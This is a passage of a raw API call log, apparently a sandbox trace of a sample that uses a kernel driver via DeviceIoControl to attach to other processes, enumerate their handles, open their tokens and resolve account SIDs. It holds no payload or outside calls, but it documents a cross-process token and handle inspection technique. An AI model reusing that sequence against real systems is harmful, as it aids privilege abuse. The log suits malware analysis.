PriorityBoost=0) [0154.480] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.480] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.480] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0154.480] PsLookupProcessByProcessId (in: ProcessId=0x414, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.480] PsAcquireProcessExitSynchronization () returned 0x0 [0154.480] KeStackAttachProcess (in: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880051635d0) [0154.480] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8010b054b0, HandleInformation=0x0) returned 0x0 [0154.480] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.480] PsReleaseProcessExitSynchronization () returned 0x2 [0154.480] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x12 [0154.480] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003005044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003005044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.480] ObfDereferenceObject (Object=0xfffffa8010b054b0) returned 0x1 [0154.480] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.480] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.481] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.481] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0154.481] PsLookupProcessByProcessId (in: ProcessId=0x414, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.481] PsAcquireProcessExitSynchronization () returned 0x0 [0154.481] KeStackAttachProcess (in: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f52310, ApcState=0xfffff880051635d0) [0154.481] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0154.481] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.481] PsReleaseProcessExitSynchronization () returned 0x2 [0154.481] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x12 [0154.481] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003006044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003006044, ReturnLength=0xfffff88005163550) returned 0x0 [0154.481] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0154.481] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.481] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x90) returned 0xc8 [0154.481] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0154.481] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001f6c060, HandleInformation=0x0) returned 0x0 [0154.481] ObOpenObjectByPointer (in: Object=0xfffffa8001f6c060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0154.481] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x14 [0154.481] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80019db300 | out: TokenHandle=0xfffffa80019db300*=0xc4) returned 0x0 [0154.481] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0154.481] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.482] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0154.482] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0154.484] CloseHandle (hObject=0xc4) returned 1 [0154.484] CloseHandle (hObject=0xc8) returned 1 [0154.484] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.484] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0154.484] PsLookupProcessByProcessId (in: ProcessId=0x90, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.484] PsAcquireProcessExitSynchronization () returned 0x0 [0154.484] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880051635d0) [0154.484] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800adfd7a0, HandleInformation=0x0) returned 0x0 [0154.484] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.485] PsReleaseProcessExitSynchronization () returned 0x2 [0154.485] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x12 [0154.485] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a0044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.485] ObfDereferenceObject (Object=0xfffffa800adfd7a0) returned 0x1 [0154.485] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.485] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.485] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.485] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0154.485] PsLookupProcessByProcessId (in: ProcessId=0x90, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.485] PsAcquireProcessExitSynchronization () returned 0x0 [0154.485] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880051635d0) [0154.485] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800dbf7df0, HandleInformation=0x0) returned 0x0 [0154.485] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.485] PsReleaseProcessExitSynchronization () returned 0x2 [0154.486] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x12 [0154.486] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a1044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.486] ObfDereferenceObject (Object=0xfffffa800dbf7df0) returned 0x1 [0154.486] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.486] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.486] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.486] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0154.486] PsLookupProcessByProcessId (in: ProcessId=0x90, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.486] PsAcquireProcessExitSynchronization () returned 0x0 [0154.486] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f6c060, ApcState=0xfffff880051635d0) [0154.486] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0154.486] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.486] PsReleaseProcessExitSynchronization () returned 0x2 [0154.486] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x12 [0154.486] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030a4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030a4044, ReturnLength=0xfffff88005163550) returned 0x0 [0154.486] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0154.486] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.486] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xc8 [0154.487] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0154.487] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001fc2b30, HandleInformation=0x0) returned 0x0 [0154.487] ObOpenObjectByPointer (in: Object=0xfffffa8001fc2b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0154.487] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x14 [0154.487] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80019db300 | out: TokenHandle=0xfffffa80019db300*=0xc4) returned 0x0 [0154.487] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0154.487] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.487] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0154.487] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0154.490] CloseHandle (hObject=0xc4) returned 1 [0154.490] CloseHandle (hObject=0xc8) returned 1 [0154.490] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.490] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0154.490] PsLookupProcessByProcessId (in: ProcessId=0x780, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.490] PsAcquireProcessExitSynchronization () returned 0x0 [0154.490] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880051635d0) [0154.490] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fc2070, HandleInformation=0x0) returned 0x0 [0154.490] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.490] PsReleaseProcessExitSynchronization () returned 0x2 [0154.490] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x12 [0154.491] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a5044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.491] ObfDereferenceObject (Object=0xfffffa8001fc2070) returned 0x1 [0154.491] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.491] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.491] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.491] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0154.491] PsLookupProcessByProcessId (in: ProcessId=0x780, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.491] PsAcquireProcessExitSynchronization () returned 0x0 [0154.491] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880051635d0) [0154.491] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020102e0, HandleInformation=0x0) returned 0x0 [0154.491] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.491] PsReleaseProcessExitSynchronization () returned 0x2 [0154.492] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x12 [0154.492] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a7044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.492] ObfDereferenceObject (Object=0xfffffa80020102e0) returned 0x1 [0154.492] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.492] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.492] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.492] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0154.492] PsLookupProcessByProcessId (in: ProcessId=0x780, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.492] PsAcquireProcessExitSynchronization () returned 0x0 [0154.492] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fc2b30, ApcState=0xfffff880051635d0) [0154.492] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0154.492] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.492] PsReleaseProcessExitSynchronization () returned 0x2 [0154.492] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x12 [0154.492] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163550) returned 0x0 [0154.493] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0154.493] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.493] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x208) returned 0xc8 [0154.493] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0154.493] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800201ea90, HandleInformation=0x0) returned 0x0 [0154.493] ObOpenObjectByPointer (in: Object=0xfffffa800201ea90, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0154.493] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x14 [0154.493] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80019db300 | out: TokenHandle=0xfffffa80019db300*=0xc4) returned 0x0 [0154.493] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0154.493] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.493] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0154.493] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0154.496] CloseHandle (hObject=0xc4) returned 1 [0154.496] CloseHandle (hObject=0xc8) returned 1 [0154.496] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.496] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0154.496] PsLookupProcessByProcessId (in: ProcessId=0x208, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.496] PsAcquireProcessExitSynchronization () returned 0x0 [0154.496] KeStackAttachProcess (in: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880051635d0) [0154.496] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002027c70, HandleInformation=0x0) returned 0x0 [0154.496] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.496] PsReleaseProcessExitSynchronization () returned 0x2 [0154.496] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x12 [0154.496] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030ac044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030ac044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.496] ObfDereferenceObject (Object=0xfffffa8002027c70) returned 0x1 [0154.496] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.497] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.497] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.497] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0154.497] PsLookupProcessByProcessId (in: ProcessId=0x208, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.497] PsAcquireProcessExitSynchronization () returned 0x0 [0154.497] KeStackAttachProcess (in: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880051635d0) [0154.497] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020279d0, HandleInformation=0x0) returned 0x0 [0154.497] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.497] PsReleaseProcessExitSynchronization () returned 0x2 [0154.497] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x12 [0154.497] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030b1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b1044, ReturnLength=0xfffff88005163508) returned 0x0 [0154.497] ObfDereferenceObject (Object=0xfffffa80020279d0) returned 0x1 [0154.497] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.497] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.498] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0154.498] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0154.498] PsLookupProcessByProcessId (in: ProcessId=0x208, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0154.498] PsAcquireProcessExitSynchronization () returned 0x0 [0154.498] KeStackAttachProcess (in: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800201ea90, ApcState=0xfffff880051635d0) [0154.498] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0154.498] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0154.498] PsReleaseProcessExitSynchronization () returned 0x2 [0154.498] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x12 [0154.498] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030b2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030b2044, ReturnLength=0xfffff88005163550) returned 0x0 [0154.498] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0154.498] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0154.498] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0154.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d4) returned 0xc8 [0154.499] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0154.499] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002038b30, HandleInformation=0x0) returned 0x0 [0154.499] ObOpenObjectByPointer (in: Object=0xfffffa8002038b30, HandleAttributes=0x200, PassedAccessState=0x0, 